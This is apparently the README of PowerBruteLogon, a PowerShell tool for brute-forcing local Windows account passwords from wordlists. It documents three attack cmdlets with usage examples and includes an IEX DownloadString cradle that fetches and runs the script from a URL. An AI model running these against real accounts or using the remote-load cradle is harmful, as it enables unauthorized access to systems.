PowerBruteLogon is a ported version of WinBruteLogon in pure PowerShell
You might find useful information about the technique used in this PoC here
You can use this PowerShell application either as a PowerShell script or as a PowerShell module.
To be available, the module must first be present in a registered module path.
You can list module paths with the following command:

```powershell
Write-Output $env:PSModulePath
```

Example Output:

```
C:\Users\Phrozen\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
```
Copy the module file `<module_name>.psm1` to the desired module path.

You can use the command below to check whether your module was successfully imported:

```powershell
Get-Module -ListAvailable
```

Example Output:

```
PS C:\Users\Phrozen\Desktop> Get-Module -ListAvailable

    Directory: C:\Users\Phrozen\Documents\WindowsPowerShell\Modules

ModuleType Version    Name            ExportedCommands
---------- -------    ----            ----------------
Manifest   <version>  <module_name>   <available_exported_commands>

<..snip..>
```

If you don't see them, run the following commands and check back.

```powershell
Import-Module <module_name>
Import-Module <module_name>
```

It is not mandatory to install this application as a PowerShell module (even if the file extension is `*.psm1`).
You can also load it as a PowerShell script. Multiple methods exist, including:

Invoking Commands Using:

```powershell
IEX (Get-Content .\<module_name>.psm1 -Raw)
```

Loading script from a remote location:

```powershell
IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/<module_name>.psm1')
```

- `Invoke-BruteLogonAccount`
- `Invoke-BruteLogonList`
- `Invoke-BruteAvailableLogons`

Attempt to recover the password of a single defined Windows User Account.

| Parameter | Type | Default | Description |
|---|---|---|---|
| Username (*) | String | None | Target Microsoft Windows local user account |
| WordList (*) | String | None | Text file location containing password candidates |

(*) = Mandatory Options

```powershell
Invoke-BruteLogonAccount -Username "darkcodersc" -Wordlist "C:\Temp\Wordlist.txt"
```

Attempt to recover the password of a list of Windows User Accounts.

| Parameter | Type | Default | Description |
|---|---|---|---|
| UserList (*) | String | None | Text file location containing user candidates |
| WordList (*) | String | None | Text file location containing password candidates |

(*) = Mandatory Options

```powershell
Invoke-BruteLogonList -UserList "C:\Temp\users.txt" -WordList "C:\Temp\Wordlist.txt"
```

Attempt to recover the password of all available local Windows User Accounts.

| Parameter | Type | Default | Description |
|---|---|---|---|
| IgnoreUsers | Array Of String | None | A list of usernames to ignore |
| WordList (*) | String | None | Text file location containing password candidates |

(*) = Mandatory Options

```powershell
Invoke-BruteAvailableLogons -WordList "C:\Temp\Wordlist.txt"
Invoke-BruteAvailableLogons -WordList "C:\Temp\Wordlist.txt" -IgnoreUsers "Phrozen"
```

PowerBruteLogon supports account lockout detection. When account lockout is configured on Windows (

You will see the following message printed on screen:

You might find the PowerShell progress bar annoying; for this reason you might want to remove the code below:

```powershell
# Display Progress / Stats
$perc = [math]::Round((100 * $currPos) / $candidateCount)
$activity = [string]::Format("Testing candidate ""{0}"" for username ""{1}""", $candidate, $targetUser)
$status = [string]::Format("$perc% Complete:{0}/{1}", $currPos, $candidateCount)
Write-Progress -Activity $activity -Status $status -PercentComplete $perc
```

Made with ❤️ in 🇫🇷



